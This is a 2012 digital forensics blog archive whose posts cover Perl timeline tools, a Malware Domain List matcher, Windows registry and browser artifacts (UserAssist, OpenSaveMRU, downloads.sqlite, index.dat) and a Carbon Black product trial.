Friday, 28 December 2012

Timeline Pivot Points with the Malware Domain List

I thought as its the end of the year it would be a good opportunity to briefly break away from the SANS Forensic Artifact posts I've been writing. In my own time I've been playing around with some code that parses a Timeline file for any URL discovered within and then compares that with the URLs listed in the Malware Domain List (MDL).

If a match is found it lists the malicious URL from MDL and the description which explains why that URL has been listed on MDL. I'm creating this for greater ability to find "Pivot Points" which both Rob Lee and Harlan Carvey mention which serve as an anchor for our investigations. Pivot Points can come in a variety of forms both verbally and technically and will hopefully assist us with a starting point or area of focus. The less time we can spend poking around an image the more time we can spend providing value to our customers or employers.

So to get started I first downloaded a copy of the Malware Domain List. You can get yourself a copy at the following location -> Once you have the list I proceeded to create an SQLlite database and imported the MDL list within it. You can easily install the Firefox addon SQLlite Manager which is the method I've used.
  1. Create a new database in the same directory as the script called malwaredomainlist.sqlite
  2. Import the MDL from CSV into new table called mdomain
  3. See screenshot below for appropriate field names to use for the table

Above are some basic steps to get you up and running and if you review the screenshot you'll see the table and field names I've used. If you decide to use the tool that I post you will want to ensure that your  filename, table name and your field names are the same as mine otherwise you'll generate some errors.

I had a few attempts at tackling how I would compare the domains discovered within my timeline to the ones within the MDL. I felt the only way to do this accurately would be to reduce both URLs down to their domain name including the suffix / tld / gtld. I had a few attempts at coding this but always found that some domain would break the script at a point. In the end I went with a pre packaged module -> To install the module type the following command from command prompt while ensuring you've obviously installed Perl in the first place. Below is the command plus the output

 ppm install Domain::PublicSuffix  
 Downloading Domain-PublicSuffix-0.07...done  
 Downloading Data-Validate-Domain-0.10...done  
 Downloading Net-Domain-TLD-1.69...done  
 Unpacking Domain-PublicSuffix-0.07...done  
 Unpacking Data-Validate-Domain-0.10...done  
 Unpacking Net-Domain-TLD-1.69...done  
 Generating HTML for Domain-PublicSuffix-0.07...done  
 Generating HTML for Data-Validate-Domain-0.10...done  
 Generating HTML for Net-Domain-TLD-1.69...done  
 Updating files in site area...done  
  11 files installed  

The above module make use of a Firefox dat file which it uses to identify the TLD / suffix on the domain. So in order for the script to work you'll need to also download this dat file which you can find at the following -> and save it within the same directory at the script.

Now that we have our database sorted I've created the following script. At this point its still a work in progress and I haven't commented it very well. As always my code is taken "as is" and I provide no additional support or responsibility for the output it provides. I'm no coding guru and always appreciate feedback on a better or more efficient way of doing things so feel free to shout out.

 #! c:\perl\bin\perl.exe   
 use Domain::PublicSuffix;  
 use DBI;   
 use strict;   
 use Getopt::Long;   
 use Regexp::Common qw /URI/;   
 use URI;  
 use List::MoreUtils qw/ uniq /;  
 my %config = ();   
 GetOptions(\%config, qw(file|f=s system|s=s user|u=s help|?|h));   
 if ($config{help} || ! %config) {   
   exit 1;   
 die "You must enter a path.\n" unless ($config{file});   
 #die "File not found.\n" unless (-e $config{file} && -f $config{file});   
 my $file = $config{file};   
 my @uniq_domains;  
 my $suffix = new Domain::PublicSuffix ({  
   'data_file' => 'effective_tld_names.dat'  
 open( my $fh, '<', $file ) or die "Can't open $file: $!";  
 while ( my $line = <$fh> ) {  
      my @url = $line =~ m/($RE{URI}{HTTP}{-scheme => qr(https?)})/g;   
           my $temp_domain = URI->new( $url[0] );  
           my $domain = $temp_domain->host;  
           my $domain1 = getDomain($domain);  
      close $fh;  
      my @unique = uniq @uniq_domains;  
           foreach ( @unique ) {       
                     if($_) {  
                          my $db = DBI->connect("dbi:SQLite:dbname=malwaredomainlist.sqlite","","") || die( "Unable to connect to database\n" );   
                          my $all = $db->selectall_arrayref("SELECT domain,description from mdomain where domain LIKE '%$_%'");   
                          foreach my $row (@$all) {   
                               my ($maldomain,$description) = @$row;        
                               my @splitdomain = split('/',$maldomain);  
                               my @splitdomain = split(':',$splitdomain[0]);                                
                               my $tempmdomain = getDomain($splitdomain[0]);                      
                               if($_ eq $tempmdomain) {  
                                    print $_.",".$maldomain.",".$description."\n";   
 sub getDomain {  
 my $root = $suffix->get_root_domain($_[0]);  
 return $root;  
  sub _syntax {   
  print<< "EOT";   
  Produce list of malware domain hits from timeline output   
  -f file..................path to timeline file   
  -h ......................Help (print this information)   
  **All times printed as GMT/UTC   
  copyright 2012 Sploit   

At this point if you run a command such as the following:

 malwaredomainlist -f timeline.csv > output.txt  

You'll be presented with output in csv format (assuming my instructions made sense) where the fields presented are the domain in question, the complete malware domain url and the description/comments. Here is a sample output:,|,RFI,,RFI,,RFI,,RFI,,Mebroot calls home,,Rogue,,compromised site directs to exploits  

As you can see from the above there are some URLs which will consistently generate false positives such as My script grabs the unique URLs listed within a timeline and typically you'll almost always have listed.

At this point I'm not sure the value in this tool. Its fairly quick to run and if you find yourself with a massive timeline file and you're not sure where to start then potentially this might be your next best bet. While i'm tweaking the code I haven't created the executable version of it yet however I have uploaded the  following code to my Google code repository to save you any issues with copying the source code above.

Hopefully you get some value out of the tool please let me know if you have any success with using it. In the meantime I'll continue to tweak and update the code. At this point it would be nice to have an option to download a fresh MDL and update the database. Overall this wouldn't take long to do manually however it would be nice for it to be automatic.

Thursday, 27 December 2012

SANS Forensic Artifact 6: UserAssist

I'm a little late to say this but firstly Happy Christmas to my readers out there. I've been fortunate enough to have a little time off but still find myself working the Christmas / New Year period. I hope some of you have more time off and can catch up on some of those tasks you've been avoiding.

For today we're moving onto the new category which I think everybody will find of interest which is Program Execution. There have been a huge number of posts on these artifacts and just how valuable they can be. Once again we'll attempt to create a few of the artifacts in different ways and see how that results when using our tools.

I still haven't forgotten about the artifacts we've missed so far and I'm currently working on some posts to cover those so that I have a complete series.

GUI-based programs launched from the desktop are tracked in the launcher on a Windows System.
All values are ROT-13 Encoded
  • GUID for XP 
    • 75048700 Active Desktop 
  • GUID for Win7 
    • CEBFF5CD Executable File Execution
    • F4E57C4B Shortcut File Execution
  • Program Locations for Win7 Userassist
    • ProgramFilesX64 6D809377-…
    • ProgramFilesX86 7C5A40EF-…
    • System 1AC14E77-…
    • SystemX86 D65231B0-…
    • Desktop B4BFCC3A-…
    • Documents FDD39AD0-…
    • Downloads 374DE290-…
    • UserProfiles 0762D272-…
Lets firstly take a look at what we see in my UserAssist registry key so we understand what our tool must export and parse and to be able to understand  which applications have launched and from where. I browsed  to the following "NTUSER.DAT\Software\Microsoft\Windows\Currentversion\Explorer\UserAssist" and found this

Within each of the Count keys listed a number of values which as mentioned above are ROT13 encoded. To the human eye they don't make much sense but once we decode them we'll easily see what the values mean. To give you a feel for what the values look like compared to the decoded values see the following output. I have just grabbed some sample values from my own computer where the first value is the ROT13 value and the second value is the decoded value.

 P:\Cebtenz Svyrf (k86)\Zbmvyyn Sversbk\bzav.wn  
 C:\Program Files (x86)\Mozilla Firefox\omni.ja  

You get the picture of what we are dealing with and as mentioned above these are just a few samples of what I have in mine. You'll notice that there are a number of values with UEME prefixing a word. These can also add context to how an applications may have been run. I've attempted to find a full list of each of these for both Windows 7 and Windows XP however I've only been able to find bits and pieces. The following list is taken from Didier Stevens blog at the following location (here).
In Windows 7 they've significantly reduced the amount as you can see below in the comparison. Many of the following are self explanatory and I won't be going into each for this particular tutorial.

 Windows 7  
 XP DLL (version 6.00.2900.3157):  

So lets try to generate some of our own values and see how that shows within the output of RegRipper. To get started I began by running 'procexp.exe' from the system internals suite. I picked this application because it was GUI based and it would be easy for me to copy it to different locations on my computer. I'd then once again use a combination of HoboCopy (to rip my active registry hive) and RegRipper to rip the userassist registry key and examine the contents. I ran procexp.exe in four different places which were Desktop, root of my username folder, Documents and finally from within the x64 Program Files location.

I  ran the following command for HoboCopy

 HoboCopy.exe c:\Users\username c:\tmp\ ntuser.dat  

Then the following for RegRipper

 rip.exe -r c:\tmp\ntuser.dat -p userassist2 > c:\tmp\userassist.txt  

The above commands produced the following output

 Thu Dec 27 07:31:20 2012 Z  
  {6D809377-6AF0-444B-8957-A3773F02200E}\procexp.exe (1)  
 Thu Dec 27 07:30:57 2012 Z  
  C:\Users\username\Documents\procexp.exe (1)  
 Thu Dec 27 07:30:37 2012 Z  
  C:\Users\username\procexp.exe (1)  
 Thu Dec 27 07:30:11 2012 Z  
  C:\Users\username\Desktop\procexp.exe (1)  

As you can see from above most of them make sense apart from the one where we ran from within our x64 Program Files. I grabbed the code highlighted in red and Googled the code. I found the following Microsoft site which explained each of the codes.

If you don't want to use the list I've posted above you can also do a find from within regedit and that will also find the code.

I decoded some of the values that I had listed in my output and placed them in the categories identified in the Microsoft article

           {1AC14E77-02E7-4E5D-B744-2EB1AE5198B7}\NOTEPAD.EXE (19)  
           {1AC14E77-02E7-4E5D-B744-2EB1AE5198B7}\cmd.exe (5)  
           {F38BF404-1D43-42F2-9305-67DE0B28FC23}\regedit.exe (1)  
           {7C5A40EF-A0FB-4BFC-874A-C0F2E0B9FA8E}\Notepad++\notepad++.exe (1)  
           {7C5A40EF-A0FB-4BFC-874A-C0F2E0B9FA8E}\Microsoft Office\Office12\OUTLOOK.EXE (11)  

Hopefully I've explained the artifact and you can take a better understanding away. This artifact has had countless articles written about it and the importance to your investigations. If you're not reviewing it then you should get started with it and make sure its part of all your investigations.

Below are some key references that I've found while researching this artifact and you might find some value.


Monday, 3 December 2012

SANS Forensic Artifact 5: Downloads.sqlite

I thought I'd get through this next artifact fairly quickly as again I've done some work prior with my Firefox script which has the option available to parse the information out of the Downloads.sqlite database.

Please note that the last category should have been posted as Artifact 4, I've adjusted that, and therefore this makes Artifact number 5 on the poster.

SANS lists the following information within the poster within their File Download Category

Firefox has a built-in download manager application which keeps a history of every file downloaded by the user. This browser artifact can provide excellent information about what sites a user has been visiting and what kinds of files they have been downloading from them.

Location: Firefox
XP %userprofile%\Application Data\Mozilla\ Firefox\Profiles\<random text>.default\downloads.sqlite
Win7 %userprofile%\AppData\Roaming\Mozilla\ Firefox\Profiles\<random text>.default\downloads.sqlite
Downloads.sqlite will include:
• Filename, Size, and Type
• Download from and Referring Page
• File Save Location
• Application Used to Open File
• Download Start and End Times

While we are on this topic I thought it might be timely to touch on a recent post by Patrick Olsen over at the System Forensics blog. Patrick posted this week about the creation of a new tool that he'd been working upon named BARFF which stands for Browser Artifact Recovery Forensic Framework. This tool is beneficial for both my last and current post but in particular the SANS poster category of "Browser Forensics". I haven't had the chance to download a copy myself as yet but I encourage anyone to give it a go and provide him with your feedback.

In terms of the structure of the Downloads.sqlite database and any of the databases associated with Firefox David Koepi has an excellent resource available here which will provide a strong resource for those wanting to get started on browser forensics. I thought it would be beneficial to first download a number of applications through Firefox and then using SQLite Manager, a plugin for firefox, we can run an initial query and take a look at what we see.

From the above screenshot there are a number of items we can use from a forensic perspective:
  • The name which contains the name of the executable
  • The source which contains the source of where the file was downloaded from.
  • The target file path
  • Start and end time which is what we'll use within our timelines
  • The state of the download as mentioned by David Koepi
    • "0"  in the state object indicates download is in progress
    • "1" in the state object indicates download is successful
    • "3" indicates download is cancelled
    • "4" indicates download is paused
  • We have a referer  field for the referring site
  •  Although not shown well in the above screenshot two important fields are preferredApplication and preferredAction which show the default application for opening 
    • "0" states that the file has been saved
    • "4" I believe states that it was open with a preferred application but more testing is required
    • In my tests i was unable to populate the preferredApplication field and again  some further testing is required
  • Lastly the currBytes and MaxBytes which can be used for a comparison between how large the file is in comparison to what has actually been downloaded.
In my example in the screenshot above I cancelled the download of FTK 4.1 and that is reflected by the state of 3 and MaxBytes lists it as -1. Important to note that this database is updated to reflect the same view as the one viewed in the graphical downloads window. Should a user delete all of the entries or remove individual downloads then this will also remove it from the database. As well as the tool mentioned above I've also created a number of Perl scripts or their converted executable to parse this information. Lets take a look at how we'd run those tools and compare the output.

To run the command you can run something like the following and obviously be aware that you're profile will be in a different location to mine.

 firefox.exe -d -p C:/Documents and Settings/username/Application Data/Mozilla/Firefox/Profiles/fd9zh9ag.default -s WORKSTATION -u USERNAME > c:\temp\events.txt  

Again this parses to Harlan's TLN timeline format and you can then convert it with the script that Harlan provides and turn this into a spreadsheet for your analysis.The output is the following.

 1353362936|FIREFOX|WORKSTATION|USERNAME|dl:winscp511setup.exe src: cB:4854080 mB:4854080  
 1353364779|FIREFOX|WORKSTATION|USERNAME|dl:sav32sfx(1).exe src: cB:72805712 mB:72805712  
 1353364806|FIREFOX|WORKSTATION|USERNAME| src: cB:3656900 mB:3656900  
 1354486120|FIREFOX|WORKSTATION|USERNAME|dl:googletalk-setup.exe src: cB:1606064 mB:1606064  
 1354493698|FIREFOX|WORKSTATION|USERNAME|dl:FTK 4.1.0 Intl.iso src: cB:0 mB:-1  

Although Chrome is not specifically mentioned I felt it was of equal importance in this category and therefore it was best I showed examples for both. Again with these examples its important that when testing these tools you note the time that you download each of the files and confirm in the output, as we did in the last post, that your timeline produces the correct time while at the same time understanding any conversions required from UTC to local time.

Again I opened the database, the History file, using SQLite Manager

In this case we don't have as much detail in the downloads table as we do with the downloads database within firefox. Once again I ran the command using a similar command to the one we used above however this time using my chrome script

 chrome -d -p "C:\Documents and Settings\username\Local Settings\Application Data\Google\Chrome\User Data\Default" -s WORKSTATION -u USERNAME > c:\temp\chrome_events.txt  

The output is the following.

 1347264951|CHROME|WORKSTATION|USERNAME|dl:C:\Documents and Settings\username\My Documents\Downloads\ChromeSetup (1).exe src: cB:739808 mB:739808  
 1354584249|CHROME|WORKSTATION|USERNAME|dl:C:\Documents and Settings\username\My Documents\Downloads\sav32sfx (1).exe src: cB:72805712 mB:72805712  
 1354584279|CHROME|WORKSTATION|USERNAME|dl:C:\Documents and Settings\username\My Documents\Downloads\googletalk-setup (1).exe src: cB:1606064 mB:1606064  
 1354584297|CHROME|WORKSTATION|USERNAME|dl:C:\Documents and Settings\username\My Documents\Downloads\sav32sfx (2).exe src: cB:72805712 mB:72805712  

Well I think I've discussed this topic enough. Again not overly complex but like everything you'll have a return on your tools if you understand what they do and have some assurance that the output is expected and once again you're aware of any adjustments you may need to make to ensure you're looking at the correct local time if required. If you're looking for the tools mentioned above that I've written you can find them at the following location


Monday, 12 November 2012

SANS Forensic Artifact 4: Index.dat / Places.sqlite

You may be wondering why at this point we've moved on from artifact 1 to artifact 4. I spent some time thinking about what I wanted to discuss PST/OST files and Skype logs and felt I needed some more time to make this more beneficial to everyone. This doesn't mean I won't be completing it just that I'll be coming back to it after we explore some of the other artifacts first. The category for today is in the  File Download category: Index.dat / Places.sqlite.

This should be a fairly easy category to post about as I've already posted some information and tools on how to parse this information.

SANS lists the following information within the poster.

Not directly related to “File Download”. Details stored for each local user account. Records number of times visited (frequency).
Location: Internet Explorer
XP %userprofile%\Local Settings\History\ History.IE5
Win7 %userprofile%\AppData\Local\Microsoft\Windows\History\History.IE5
Win7 %userprofile%\AppData\Local\Microsoft\Windows\History\Low\History.IE5
Location: Firefox
XP %userprofile%\Application Data\Mozilla\ Firefox\Profiles\<random text>.default\places.sqlite
Win7 %userprofile%\AppData\Roaming\Mozilla\ Firefox\Profiles\<random text>.default\places.sqlite

For today we can easily test the tools we have by browsing to certain sites and making a note in regards to the time we viewed the site. When we run our tools we should be able to see the same time referenced by our tool. Other areas we can look at are what happens when we delete the history and whether entries remain or they're removed. Finally I wanted to touch on some of the different entries you'll find within the index.dat file which are URL / LEAK / REDR entries. I'll touch briefly on LEAK entries and link to a practical example of how we create one of these entries. This should help us associate our own experiences in future incidents where we may be responding to incidents that contain these artifacts.

Firstly lets start by browsing three websites in both Internet Explorer and Firefox and i'll show how to parse the data using Harlan Carvey's open source perl scripts and some of my own. We'll then convert these into TLN format and confirm our times with those we noted at the time we visited each site.

Here are the times I noted for each site I visited with both IE and Firefox. I know this is an unrealistic example because nobody ever users bing or yahoo right? poor attempt at humour, stay with me it can only get better.

Firefox - 10:12am - 10.12am - 10.13am

Internet Explorer - 10.13am - 10.14am - 10.15am

I started by parsing my index.dat file with the following command, which uses Harlan's urlcache script, and producing my initial events.txt file -f "C:/Documents and Settings/username/Local Settings/History/History.IE5/index.dat" -l >> events.txt  

Following that I used my own script and ran the following command -p "C:/Documents and Settings/username/Application Data/Mozilla/Firefox/Profiles/fd9zh9ag.default" -d >> events.txt  

Finally I ran Harlan's parse script to create my timeline file. -f events.txt -c > timeline.csv  

Lets compare our timeline results with the times we listed above. Important to note is that Harlan's timeline tools produce output in UTC time. So depending which timezone you are in you may need to add a column and adjust the time to your local. I typically use a cell value such as the following =A1+TIME(#,0,0) where '#' should be replaced with the hours you wish to add.

So firstly I wanted to add that I've already had some value out of checking my own tool as you can see from the screenshot above the firefox history is in the wrong cell in comparison to Harlan's script. This is pretty easy to fix and I'll resolve that as soon as I can for everyone. It shouldn't affect your timelines in any way however.

If we compare our results from the above

Firefox - 10:12am - tln: 10:12am - 10.12am - tln: 10.12am - 10.13am - tln:

Internet Explorer - 10.13am - tln: 10.13am - 10.14am - tln: 10.14am - 10.15am - - tln: 10:15am

So the above is pretty clear that our tools are producing the output we are expecting. Again this is all fairly basic at this point but it shows now we have an understanding of what the output of our tools look like and we're confident that they're producing the correct times for us to evaluate. This can be critical in terms of your incident response as you do not want to miss an artifact because you thought your tool was providing the correct time when it was in fact off by a number of minutes or hours.

So what happens when we delete the history I presume we lose this information and our timeline should be empty. Lets test the theory by clearing all of the IE history and four hours firefox history.

I ran the same commands as I did above and as expected the last data I had was from the previous time I used the workstation and had nothing from the current day for firefox. There was also no information for Internet explorer at all. So this is worthwhile keeping in mind while you're investigating in that if the user has deleted their history you may need to go to other areas to identify sites visited. The guys at Volatility have written an excellent article on how to scan for Internet history through the use of one of their plugins.

Finally some further discussions around LEAK entries within the IE History. What are LEAK entries? Well Mike Murr from SANS classifies them as the following

"Essentially, a LEAK record is created when a cached URL entry is deleted (by calling DeleteUrlCacheEntry) and the cached file associated with the entry (a.k.a. "temporary internet file" or TIF) can not be deleted."

The above article discusses an easy way to create a LEAK entry. Mike also discusses in more detail at the following link on how to create LEAK entries using some Python scripts which are unfortunately unavailable due to dead links but you should be able to recreate it if required.

Again if you would like access to my firefox script you can grab it from the following


Wednesday, 10 October 2012

SANS Forensic Artifact 1: Open/Save MRU

As most of you would have seen by now SANS posted a fantastic forensic poster for everybody to use which will "map a specific artifact to the analysis question that it will help to answer". Basically what that means is that SANS have 8 categories used to determine an analysis question. "Was the file opened?" for example an analyst could review the 'File Opening / Creation" category which will show artifacts that assist in determining whether files were opened.

We already know there are a number of tools available to us that can easily rip this information to us, such as RegRipper, and countless articles written about each of the artifacts listed. I find however that if you're purely reviewing the output of the tools to identify that a file was opened or that a file had executed in some way you may be missing the context in how that file was opened. Security analysts must ensure they have the technical understanding for each of the tools they run to ensure they can explain the prescence of an artifact, or lack thereof, listed within the output of their tools.

So I thought for my own benefit I'd create a series of blog posts going through each of the forensic artifacts and hopefully providing some examples with screenshots on how each artifact is created. Again there is no better way to understand these tools then running it across your own workstation where you understand exactly what you've done to complete that action. So with that being said lets take a look at the first artifact SANS lists within the File Download category: Open/Save MRU.

SANS lists the following information within the poster.

In simplest terms, this key tracks files that have been opened or saved within a Windows shell dialog box. This happens to be a big data set, not only including web browsers like Internet Explorer and Firefox, but also a majority of commonly used applications.
XP NTUSER.DAT\Software\Microsoft\Windows\CurrentVersion\Explorer\ComDlg32\OpenSaveMRU
Win7 NTUSER.DAT\Software\Microsoft\Windows\CurrentVersion\Explorer\ComDlg32\OpenSavePIDlMRU
• The “*” key – This subkey tracks the most recent files of any extension input in an OpenSave dialog

• .??? (Three letter extension) – This subkey stores file info from the OpenSave dialog by specific extension

So how can we test the information we've been presented with above. The best and simplest way is create a text file called SANS_ForensicArtifact1_MRU_1.txt  and SANS_ForensicArtifact1_MRU_2.txt and open one of them within notepad through the Windows shell dialog box and open another just by double clicking and letting the associated application open the file. We should note the differences in this key from before and after snapshots.

There were a number of ways to export the user hive from my current workstation I decided to leverage of one of my previous posts by using hobocopy to rip it from my live machine. You could use tools such as the built in regedit.exe,  simply run a reg save query from the command line or even use a tool such as ftkimager to get this information.

I ran the following first so that  I could have a comparison. Please note there are two separate commands in the dialog box below.

FOR /F "tokens=*" %%G IN ('dir /b ^"C:\Documents and Settings\*^"') DO .\tools\hob\hobocopy.exe "c:\Documents and Settings\%%G" .\hives\%%G NTUSER.DATregripper command:rip.exe -r ..\..\hives\username\NTUSER.DAT -f ntuser >> username.txt

I searched the output of regripper for OpenSaveMRU and currently it only listed documents that I'd open previously.

Important to note that  from the above example the first key is for objects opened that do not have an extension. The SANS reference below indicates the following "The values stored in the key itself are items that do not have file extensions associated with them. Since most files have extensions, what often ends up here is auto-complete information".

The '*' key indicates the last 10 files opened through the windows dialog box regardless of the extension it has. This can assist us with determining the opening order of each of those 10 files listed. Finally there is a key for each of the extensions opened and in this case we are only concerned with the txt so that we can use our example above. Lets open our file created above and I'll also open a secondary location with a file that has no extension in c:\blogmrulocation\test_noext

As you can see from the screenshot I've opened the file named SANS_ForensicArtifact1_MRU_1.txt. I also opened the file with no extension. For compasion I also double clicked on SANS_ForensicArtifact1_MRU_2.txt (i.e. did not open through windows dialog box) so that we have a  comparison to work with.

Lets run the script again to dump my hive and process it with regripper.

As we can see the only files listed are the ones that we opened through the windows dialog box and there is nothing currently listed for SANS_ForensicArtifact1_MRU_2.txt. As I ran the RegRipper plugin with the -f ntuser option selected it will parse my ntuser.dat file against a number of different plugins and enter the output in the same text file. I decided to search for the second file opened through double click to see where we had references for it.

Although the above keys have nothing to do with my current post (although we'll hit on them later) its important to note that our actions have modified another area within the system so now we not only understand how to review items opened within the windows dialog but we also have some clues how we can identify items not opened by the dialog.

None of this information above is rocket science by any means and as listed from the SANS reference below the information has already been provided by Chad Tilbury who has written an excellent article on these registry keys. What I do hope to provide to you from this is post is some practical examples and comparisons between what we saw before and what we saw after the files were open. The next time we run the tool rather than accepting the output for what it is we'll have a deeper understanding and hopefully revert back to our example to assist with better understanding and gathering context to an incident where we do not have the luxury of understanding how or why a file was opened and therefore need to piece our view of the world back together.


Friday, 5 October 2012

The Carbon Black Test Drive

 Many of the readers of this blog have most likely heard of Carbon Black by now. Carbon Black describes its product as "the world’s first ‘surveillance camera’ for computers". Carbon Black highlights five key elements that it can monitor which are

1. A record of execution
2. A record of files system modifications
3. A record of registry modifications
4. A record of new outbound network connections
5. A copy of every unique binary executed

We're all aware that antivirus and signature based detection methods are no longer keeping up with the huge amount of samples produced every day. Carbon Black recently posted an article called Second AV Study Reveals Small Window For Catching New Malware which caught my eye. The article highlights that using multiple AV products provides better ability to detect a malicious sample which makes sense to me. The article highlights that running multiple AV on a workstation is obviously a nightmare so instead they developed a plugin which uploads binaries to VirusTotal to leverage multiple AV.

Based on the above I thought that it might be time to download the trial and better understand what this tool could do. Although there are some amazing articles written on Carbon Black, see links below, nothing is better than getting hands on with the tool. Signing up for the trial was quick and easy and before I knew it I had downloaded the CB server and installed. Upon logon I was presented with the following screen.

My test lab is fairly unsophisticated in its approach but it should be enough to get a solid understanding of what CB can do. The next step for me was to create the client package so that I could install this on my Win XP test machine. As you can see from the screenshot its very simple, you hit the 'generate' button and before you know it you have your client. I installed this on my machine and within minutes I started to see results within my console.

Carbon Black offers a number of plugins and some of which I've mentioned above. In particular I was most interested in the 'droppercheck', 'virustotal' and the 'autoruns' plugin. See the below screenshot.

Droppercheck was as simple to turn on as selecting the checkbox however the other plugins had a number of options to configure. Within minutes I had all the plugins that I wanted activated successfully.



Once the client was installed I thought the best way to test it was to start hitting sites listed on malware domain list and see that what samples I could download to my test workstation. After spending a few minutes hitting random URLs I managed to get a malicious binary to download to my test workstation.

Now that I had my malicious executable I was keen to understand what the virus total plugin had detected.  First I checked the summary of the virus total plugin. I could see some detections already

 I clicked on the infected binaries link and was presented with the following screen

Clicking on any of the links I could see the virus total results. I also checked the status of my virus total account and whether it listed the files that had been uploaded under API submissions and sure enough I had some results there also.

So from a virus perspective its safe to say that Carbon Black is providing a significant benefit to organisations. AV is far from perfect and its struggling to keep up with samples so to have the benefit of running your files against virus total automatically and having access to all of the autorun type registry keys I see as a huge advantage. Too often these days I see a huge amount of faith put in a tool that should automatically detect malicious activity based on signatures or patterns. I like that Carbon Black provides me with a means to access the information that is important to me or my employer. This also made me wonder what other information I could source from the tool. I knew that i'd run some SysInternal tools and I wondered what information I could find in regards to this.

I decided to look up *sysinternals* within the registry modifications search and the first three entries showed the MUI Cache entries for each of these tools.

As the links have highlighted below Carbon Black offers much more than just searching for malicious executables or an indication of persistance. Information that we typically wouldn't have access to until a forensic investigation is now available to us in the form of a easy and fast search option to confirm the state of our environment across our entire fleet.

I would be keen to understand the amount of bandwidth and storage to maintain this solution over long term for a large global organisation. I would consider that in comparison to SIEM type tools or full packet capture the footprint would be relatively small. Do any of you have some success stories in large environments?

Well I hope you gained something from this post. As always I'd be keen to hear anything from my readers in regards to their successes or issues with this tool.

Some other articles written on carbon black

Sunday, 16 September 2012

TLN tools updated - New features added

I've been continuing to play and refine some of the tools I've recently posted. As mentioned they were only beta and I still consider them to be just that. As always usage of the tools should be at your own risk and I provide no warranty for the result set they provide. However in saying that as we continue to refine them hopefully my readers can see some consistent and expected results. One of the other issues I've had with posting my tools is that when copied to a  text file you can have some issues when running them. Due to the spaces added at the end of the file which can cause Perl EOF errors which can be confusing if you're new to Perl. To resolve this I've created my own Google Code repository and I've uploaded both the Perl scripts and the executable. Hopefully this will resolve that issue.

You can find this repository and the tools at the following location.

The reason for the following changes with the firefox and chrome scripts was because the scripts weren't that useful from an automated perspective due to Firefox using a random folder name e.g  "xxxxxxxx.default" to store the user profile. So by creating a file listing before using tsk fls, to create a bodyfile, the output can be then be parsed to and to automatically find the required files for the timeline. The other benefit to this is that many users don't automatically store the profiles in their user profile due to profile storage space. Its not uncommon to find the browser history files in the root of the C drive because the user has moved it and therefore my tool still accommodates for this scenario.  
 - Added the -d option to allow parsing of the downloads.sqlite database to TLN format  
 - Added the -a option which uses the bodyfile output from tsk fls and parses each places/download.sqlite database discovered within it.  
 - Addded the -u option to include the username within the TLN format  
 - Added the -d option to allow parsing of the downloads table within the History sqlite database  
 - Added the -a option which uses the bodyfile output from tsk fls and parses each History sqlite database discovered within it  
 - Added the -u option to include the username within the TLN format  
 - Resolved a bug with the script where IDX files that contained output on multiple lines were not parsed correctly  

As mentioned above I've added each of the files to the code repository. Hopefully for any Perl guru's out there you might be able to see some issues with my code or potentially some more efficient ways of coding the tools. Please feel free to update those tools and let me know any changes that can be made so we can all benefit. I'd be really keen to see if anybody is finding the tools a benefit to their investigations and maybe have some examples that can be shown also. Feel free to add thanks or issues to the comments below I look forward to having some feedback.

I have a number of future scripts in mind for adding logs to the TLN format. For any of you out there that require a script feel free to let me know and I can see if i can help out. In saying that for anybody out there with some basic scripting skills its very easy to pick Perl up and create some basic regex queries. Before you know it any file with a date and something useful within it can be added to your timelines and assist with your investigations..

Wednesday, 15 August 2012

Java Forensics using TLN Timelines

Based on my last two previous posts I thought it might be a good time to see how we can introduce some of the Java artifacts we've reviewed. I decided to create a perl script to parse .idx files within the Java cache into TLN format for import into our timelines. I hope that this script will be able to provide analysts with greater context to their investigations and also have a quick way to eyeball URLs within the idx files for anything that could be potentially malicious. Its important to note that again this script is in BETA and further testing is required before you should trust the results within your own investigations.

I had a strong response from my last post on TLN and browser forensics however a number of users did have issues when copying the code and attempting to run with errors such as "Can't find string terminator "EOT" anywhere before EOF at C:\ line 31". If you get this error its most likely you need to remove the two spaces after EOT and one space before EOT at the very end of the file. I'm also in the process of organising a Google code repository and hopefully this will resolve that issue.

In saying that lets take a look at the script.

 #! c:\perl\bin\perl.exe  
 # Parse .idx files with the Java cache to TLN format  
 # Version: 0.1 (BETA)   
 # Examples:   
 use DBI;  
 use strict;  
 use Getopt::Long;  
 use File::Find;  
 use Regexp::Common qw /URI/;  
 use Time::Local;  
 my %config = ();  
 GetOptions(\%config, qw(path|p=s system|s=s user|u=s help|?|h));  
 if ($config{help} || ! %config) {  
     exit 1;  
 die "You must enter a path.\n" unless ($config{path});  
 #die "File not found.\n" unless (-e $config{path} && -f $config{path});  
 my $path =$config{path};  
 my @files;  
 my $line = $_;  
 my %months = ('Jan'=>'01','Feb'=>'02','Mar'=>'03','Apr'=>'04','May'=>'05','Jun'=>'06','Jul'=>'07','Aug'=>'08','Sep'=>'09','Oct'=>'10','Nov'=>'11','Dec'=>'12');  
 my $start_dir = $path;  
   sub { push @files, $File::Find::name unless -d; },  
 for my $file (@files) {  
   my ($ext) = $file =~ /(\.[^.]+)$/;  
   if ($ext eq ".idx") {  
             $file =~ s/\\/\//g;  
             open( FILE, "< $file" ) or die "Can't open $file : $!";  
             if ($line){  
                 my @timestamps = $line =~ m/[0-3][0-9] [a-zA-Z][a-z][a-z] [0-9][0-9][0-9][0-9] [0-2][0-9]:[0-5][0-9]:[0-5][0-9]/g;   
                 my @url = $line =~ m/($RE{URI}{HTTP}{-scheme => qr(https?)})/g;   
                 $timestamps[1] = getEpoch($timestamps[1]);  
                 print $timestamps[1]."|JAVA|".$config{system}."|".$config{user}."|".$url[0]."\n";  
 sub getEpoch {  
     my $time = substr ( $_[0],index($_[0], ' ', 10)+1,length($_[0])-1);  
     my $date = substr ( $_[0],0,index($_[0], ' ', 10));  
     my ($hr,$min,$sec) = split(/:/,$time,3);  
     my ($dd,$mm,$yyyy) = split(/ /,$date,3);  
     $mm = $months{$mm};  
     $mm =~ s/^0//;  
     my $epoch = timegm($sec,$min,$hr, $dd,($mm)-1,$yyyy);  
     return $epoch;  
 sub _syntax {  
 print<< "EOT";  
 Parse Java cache IDX files (  
  -p Path..................path to java cache  
  -s Systemname............add systemname to appropriate field in tln file  
  -u user..................add user (or SID) to appropriate field in tln file  
  -h ......................Help (print this information)  
 Ex: C:\\> -p C:\\Documents and Settings\\userprofile\\Application Data\\Sun\\Java\\Deployment\\cache\\\ -s %COMPUTERNAME% -u %USERNAME% > events.txt  
 **All times printed as GMT/UTC  
 copyright 2012 Sploit  

